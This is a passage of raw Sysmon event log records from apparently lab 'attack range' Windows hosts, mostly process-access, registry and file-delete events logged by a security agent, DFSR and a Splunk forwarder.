Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045794Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.699{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000045793Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:11.197{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=138A28A4B445504511247DF92E611C7C,SHA256=4362B250E9BF9199C98E9D7869D946EE0D0C1EAB1D28EBF137920D56E57619FA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000045824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:28:12.623{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6335A056-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6335A056-0000-0000-0000-100000000000.XML 13241300x800000000000000045823Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:28:12.608{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Config SourceDWORD (0x00000001) 13241300x800000000000000045822Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:28:12.608{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B.XML 10341000x800000000000000045821Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.608{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045820Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.608{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045819Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.267{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6314FE9AF98134A86795200565F6D72,SHA256=2672E22D5C4E5216948BB1A40733A19EFE836800B3380F8C05C49F43DCE37217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045818Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:12.237{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000018175Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:12.330{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB721DAEDD2928EBBF5E82C393F40EBA,SHA256=CFC5DD00D63BD6CCA7AC4D3D7C9B7E84629B46EC49C44EB948F47492FD2735D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000018174Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:09.906{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50168-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000045833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.452{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.452{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.452{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000045830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.358{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E62085C1E34B09549B0D8FFEDC9837B3,SHA256=F4017519FC20A68D02EBDC67348019FA10C60322887F4BDE8A722FD6B052AAD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018176Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:13.421{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A3D45971E639EBE2E5AB32C26BA676E,SHA256=A7CAF9E49DD3A8CD4F363E1373E4AF2070538F42B5F8D11EDA2D3C3B731C66B3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000045829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.128{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.128{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.128{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.128{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:13.128{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018177Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:14.499{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=792D88A1EEA0D597924F458BE2D4D5B8,SHA256=F02FA8E2E91AF5E10C66F797C7802B6A6B66F93A61509BD66F58DBACF4C33BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.922{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=ED24CA87CAD81966E4EEE45B690A0654,SHA256=7EDA643ED28CFDD91B589E35070572617D305E2602C4E479706E6A1697FFF83D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.913{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D328C1BEA9BE71A8A86BCA57DC395896,SHA256=9C9C48FBA1E57A3B739838683F572B4C74387656DD96786D1C0EE05DDE2F439E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.865{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.862{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045863Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.844{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045862Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045861Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:14.814{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program 